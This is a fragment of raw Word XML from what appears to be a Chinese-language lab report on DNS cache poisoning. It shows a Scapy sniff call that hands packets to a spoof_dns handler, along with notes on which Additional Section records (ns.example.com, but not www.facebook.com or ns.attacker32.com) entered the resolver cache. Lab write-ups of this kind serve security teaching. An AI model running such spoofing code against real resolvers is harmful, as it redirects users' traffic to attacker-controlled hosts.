      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>pkt=sniff(iface='br-2d61e239ce80', filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284899E0" w14:textId="0443ECA9" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDAD168" w14:textId="2C8011A7" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD5BFD6" w14:textId="4FF1415B" w:rsidR="00BA2083" w:rsidRDefault="00493CCE" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75651F37" wp14:editId="2D9D920B">
            <wp:extent cx="5274310" cy="4097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D7D9" w14:textId="1B816060" w:rsidR="00BA2083" w:rsidRDefault="00493CCE" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDF9BF8" w14:textId="4D5B106D" w:rsidR="00BA2083" w:rsidRDefault="00BA2083" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55664554" wp14:editId="0C53694B">
            <wp:extent cx="5274310" cy="19570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FF5D" w14:textId="30B8118A" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Additional</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Section</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段只有ns</w:t>
      </w:r>
      <w:r>
        <w:t>.example.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被写入dns缓存中</w:t>
      </w:r>
      <w:r w:rsidR="00531A8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEE7C10" w14:textId="34402E62" w:rsidR="004F3C6C" w:rsidRDefault="004F3C6C" w:rsidP="004F3C6C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00BC1465">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>www.facebook.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未被写入是因为</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其与A</w:t>
      </w:r>
      <w:r>
        <w:t>UTHORITY SECTION</w:t>
      </w:r>
      <w:r w:rsidR="000C0365">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的域名无关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26811619" w14:textId="676098DC" w:rsidR="004F3C6C" w:rsidRPr="007C4BB9" w:rsidRDefault="004F3C6C" w:rsidP="004F3C6C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但ns</w:t>
      </w:r>
      <w:r>
        <w:t>.attacker32.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未被写入的原因不明。</w:t>
      </w:r>
      <w:r w:rsidR="000C0365">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜测可能为cache中A</w:t>
      </w:r>
      <w:r w:rsidR="000C0365">
        <w:t>UTHORITY</w:t>
      </w:r>
      <w:r w:rsidR="000C0365">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段的顺序问题导致未被存入或者两域名之间的关联度不大</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004F3C6C" w:rsidRPr="007C4BB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6E3E2" w14:textId="77777777" w:rsidR="006003CC" w:rsidRDefault="006003CC" w:rsidP="00B85B8C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6AED153E" w14:textId="77777777" w:rsidR="006003CC" w:rsidRDefault="006003CC" w:rsidP="00B85B8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F1371" w14:textId="77777777" w:rsidR="00B85B8C" w:rsidRDefault="00B85B8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E05BB" w14:textId="77777777" w:rsidR="00B85B8C" w:rsidRDefault="00B85B8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DA604" w14:textId="77777777" w:rsidR="00B85B8C" w:rsidRDefault="00B85B8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9072A" w14:textId="77777777" w:rsidR="006003CC" w:rsidRDefault="006003CC" w:rsidP="00B85B8C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2431A0E3" w14:textId="77777777" w:rsidR="006003CC" w:rsidRDefault="006003CC" w:rsidP="00B85B8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ECF27" w14:textId="77777777" w:rsidR="00B85B8C" w:rsidRDefault="00B85B8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F876F" w14:textId="77777777" w:rsidR="00B85B8C" w:rsidRDefault="00B85B8C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CFC8B" w14:textId="77777777" w:rsidR="00B85B8C" w:rsidRDefault="00B85B8C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83D"/>
    <w:rsid w:val="000038BF"/>
    <w:rsid w:val="00091412"/>
    <w:rsid w:val="000A710B"/>
    <w:rsid w:val="000C0365"/>
    <w:rsid w:val="003A1D03"/>
    <w:rsid w:val="00493CCE"/>
    <w:rsid w:val="004F3C6C"/>
    <w:rsid w:val="00521432"/>
    <w:rsid w:val="00531A8F"/>
    <w:rsid w:val="00573F58"/>
    <w:rsid w:val="005D3E65"/>
    <w:rsid w:val="006003CC"/>
    <w:rsid w:val="006E4D93"/>
    <w:rsid w:val="00725AD3"/>
    <w:rsid w:val="007C4BB9"/>
    <w:rsid w:val="007F3B4F"/>
    <w:rsid w:val="00880D75"/>
    <w:rsid w:val="0099699C"/>
    <w:rsid w:val="00B7215A"/>
    <w:rsid w:val="00B85B8C"/>
    <w:rsid w:val="00BA2083"/>
    <w:rsid w:val="00C12AFA"/>
    <w:rsid w:val="00C32D2F"/>
    <w:rsid w:val="00C5583D"/>
    <w:rsid w:val="00E35132"/>
    <w:rsid w:val="00EF34A2"/>
    <w:rsid w:val="00F6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F2C2C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8E7F7E65-2BF9-41B5-BEE4-20BE18BF4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5B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5B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5B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5B8C"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006E4D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E4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facebook.co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www.examp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hyperlink" Target="http://www.example.com" TargetMode="External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11</Pages>
  <Words>828</Words>
  <Characters>4722</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>39</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop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扶影</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>柳 扶影</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-19T01:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-20T15:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>